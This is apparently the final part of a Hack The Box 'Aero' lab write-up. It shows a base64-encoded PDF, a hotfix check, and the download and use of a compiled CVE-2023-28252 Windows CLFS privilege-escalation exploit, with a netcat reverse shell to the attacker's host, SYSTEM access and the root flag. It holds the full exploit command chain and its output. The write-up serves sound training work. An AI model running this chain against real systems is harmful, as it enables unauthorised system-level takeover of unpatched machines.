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NZWRpYUJveFswIDAgNjEyIDc5Ml0vQ29udGVudHMgMiAwIFI+PgplbmRvYmoKCjQgMCBvYmoKPDwvVHlwZS9QYWdlcwovUmVzb3VyY2VzIDExIDAgUgovTWVkaWFCb3hbIDAgMCA2MTIgNzkyIF0KL0tpZHNbIDEgMCBSIF0KL0NvdW50IDE+PgplbmRvYmoKCjEyIDAgb2JqCjw8L1R5cGUvQ2F0YWxvZy9QYWdlcyA0IDAgUgovT3BlbkFjdGlvblsxIDAgUiAvWFlaIG51bGwgbnVsbCAwXQovTGFuZyhlbi1VUykKPj4KZW5kb2JqCgoxMyAwIG9iago8PC9DcmVhdG9yPEZFRkYwMDU3MDA3MjAwNjkwMDc0MDA2NTAwNzI+Ci9Qcm9kdWNlcjxGRUZGMDA0QzAwNjkwMDYyMDA3MjAwNjUwMDRGMDA2NjAwNjYwMDY5MDA2MzAwNjUwMDIwMDAzNzAwMkUwMDM0PgovQ3JlYXRpb25EYXRlKEQ6MjAyMzA5MjExODE4MTQrMDInMDAnKT4+CmVuZG9iagoKeHJlZgowIDE0CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAxMzIwNSAwMDAwMCBuIAowMDAwMDAwMDE5IDAwMDAwIG4gCjAwMDAwMDE1NTAgMDAwMDAgbiAKMDAwMDAxMzMwMyAwMDAwMCBuIAowMDAwMDAxNTcxIDAwMDAwIG4gCjAwMDAwMTE5ODcgMDAwMDAgbiAKMDAwMDAxMjAwOSAwMDAwMCBuIAowMDAwMDEyMTk3IDAwMDAwIG4gCjAwMDAwMTI3MzcgMDAwMDAgbiAKMDAwMDAxMzExOCAwMDAwMCBuIAowMDAwMDEzMTUwIDAwMDAwIG4gCjAwMDAwMTM0MDIgMDAwMDAgbiAKMDAwMDAxMzQ5OSAwMDAwMCBuIAp0cmFpbGVyCjw8L1NpemUgMTQvUm9vdCAxMiAwIFIKL0luZm8gMTMgMCBSCi9JRCBbIDw2MjVDNEQ2QjQ3NjREOUI3QzdDQzg0OTg1MTlGQzYxMj4KPDYyNUM0RDZCNDc2NEQ5QjdDN0NDODQ5ODUxOUZDNjEyPiBdCi9Eb2NDaGVja3N1bSAvRjBBQkY4NUJDOEIxQjkxRUYzMkVBNkM5RTUzM0QwMTQKPj4Kc3RhcnR4cmVmCjEzNjc0CiUlRU9GCg==

Read file: CVE-2023-28252_Summary.pdf

Copy base64 to file and decode base64

┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ cat CVE-2023-28252_Summary.pdf_base64| base64 -d > CVE-2023-28252_Summary.pdf
---
Open pdf file: CVE-2023-28252_Summary.pdf

┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ atril CVE-2023-28252_Summary.pdf

Check list of hotfix

We see only 7 hotfix's, after read article I see that lost important hotfix: KB5025224 --> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252

---
PS C:\Users\sam.emerson\Documents> systeminfo
systeminfo

Host Name:                 AERO
OS Name:                   Microsoft Windows 11 Pro N
OS Version:                10.0.22000 N/A Build 22000
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          sam.emerson
Registered Organization:   
Product ID:                00332-00332-83900-AA094
Original Install Date:     9/18/2023, 12:06:55 PM
System Boot Time:          4/18/2024, 12:03:34 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,589 MB
Virtual Memory: Max Size:  5,503 MB
Virtual Memory: Available: 3,809 MB
Virtual Memory: In Use:    1,694 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\AERO
Hotfix(s):                 7 Hotfix(s) Installed.
                           [01]: KB5004342
                           [02]: KB5010690
                           [03]: KB5012170
                           [04]: KB5026038
                           [05]: KB5026910
                           [06]: KB5023774
                           [07]: KB5029782
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.237
                                 [02]: fe80::b964:df46:ab83:46e0
                                 [03]: dead:beef::e805:8e9a:2c0d:371
                                 [04]: dead:beef::ec0d:a2ce:e8f8:f251
                                 [05]: dead:beef::237
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Exploit: CVE-2023-2852 Privesc Exploit

https://github.com/duck-sec/CVE-2023-28252-Compiled-exe

Download exploit

┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ git clone https://github.com/duck-sec/CVE-2023-28252-Compiled-exe.git
Cloning into 'CVE-2023-28252-Compiled-exe'...
remote: Enumerating objects: 65, done.
remote: Counting objects: 100% (65/65), done.
remote: Compressing objects: 100% (54/54), done.
remote: Total 65 (delta 18), reused 47 (delta 7), pack-reused 0
Receiving objects: 100% (65/65), 7.73 MiB | 5.45 MiB/s, done.
Resolving deltas: 100% (18/18), done.

┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ cd CVE-2023-28252-Compiled-exe                                               

┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Aero/CVE-2023-38146/CVE-2023-28252-Compiled-exe]
└─$ ls
clfs_eop  clfs_eop.sln  exploit.exe  LICENSE  README.md  x64

Upload exploit to remote host

┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Aero/CVE-2023-38146/CVE-2023-28252-Compiled-exe]
└─$ python3 -m http.server 80                            
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.237 - - [18/Apr/2024 11:32:22] "GET /exploit.exe HTTP/1.1" 200 -
10.10.11.237 - - [18/Apr/2024 11:35:41] "GET /nc64.exe HTTP/1.1" 200 -
---
PS C:\Users\sam.emerson\Documents> iwr http://10.10.16.7/exploit.exe -outfile clfs_eop.exe
iwr http://10.10.16.7/exploit.exe -outfile clfs_eop.exe
PS C:\Users\sam.emerson\Documents> iwr http://10.10.16.7/nc64.exe -outfile nc64.exe
iwr http://10.10.16.7/nc64.exe -outfile nc64.exe
PS C:\Users\sam.emerson\Documents>

Run exploit

┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Aero/CVE-2023-38146/CVE-2023-28252-Compiled-exe]
└─$ rlwrap nc -lvnp 443                                                                                       
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.237] 55226
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Users\sam.emerson\Documents>whoami
whoami
nt authority\system
---
PS C:\Users\sam.emerson\Documents> iwr http://10.10.16.7/exploit.exe -outfile clfs_eop.exe
iwr http://10.10.16.7/exploit.exe -outfile clfs_eop.exe
PS C:\Users\sam.emerson\Documents> iwr http://10.10.16.7/nc64.exe -outfile nc64.exe
iwr http://10.10.16.7/nc64.exe -outfile nc64.exe
PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe 1208 1 ".\nc64.exe 10.10.16.7 443 -e cmd"
.\clfs_eop.exe 1208 1 ".\nc64.exe 10.10.16.7 443 -e cmd"
Executing command: .\nc64.exe 10.10.16.7 443 -e cmd


ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1


VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFBDC6A4240
[+] pool NpAt VirtualAddress -->FFFF960FCC4DF000
[+] MY EPROCESSS FFFFA8022B58B0C0
[+] SYSTEM EPROCESSS FFFFA8022709C040
[+] _ETHREAD ADDRESS FFFFA802271BE080
[+] PREVIOUS MODE ADDRESS FFFFA802271BE2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF807240A3220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF807240BBFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80726543010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF80726BC87B0

[+] Kernel PoFxProcessorNotification --------------------------> FFFFF807265DBD00


PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\19
[+] Base file path = C:\Users\Public\19.blf
[+] Container file name path = C:\Users\Public\.p_19
Last kernel CLFS address = FFFF960FC84A6000
numero de tags CLFS founded 9

Last kernel CLFS address = FFFF960FCF03D000
numero de tags CLFS founded 1

[+] Log file handle: 0000000000000104
[+] Pool CLFS kernel address: FFFF960FCF03D000

number of pipes created =5000

number of pipes created =4000
TRIGGER START
System_token_value: FFFF960FC7241597
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM

Read flag: root.txt

C:\Users\sam.emerson\Documents>type C:\Users\Administrator\Desktop\
type C:\Users\Administrator\Desktop\
The system cannot find the path specified.

C:\Users\sam.emerson\Documents>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
a61d0f2aea7019bbf5bb9106e6d1676c

References

[CVE-2023-38146 - ThemeBleed (Windows 11 Themes)](https://github.com/Jnnshschl/CVE-2023-38146)
[CVE-2023-2852 Privesc Exploit - compiled exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe)
[CVE-2023-2852 Privesc Exploit (details)](https://github.com/fortra/CVE-2023-28252)

Lessons Learned

Tags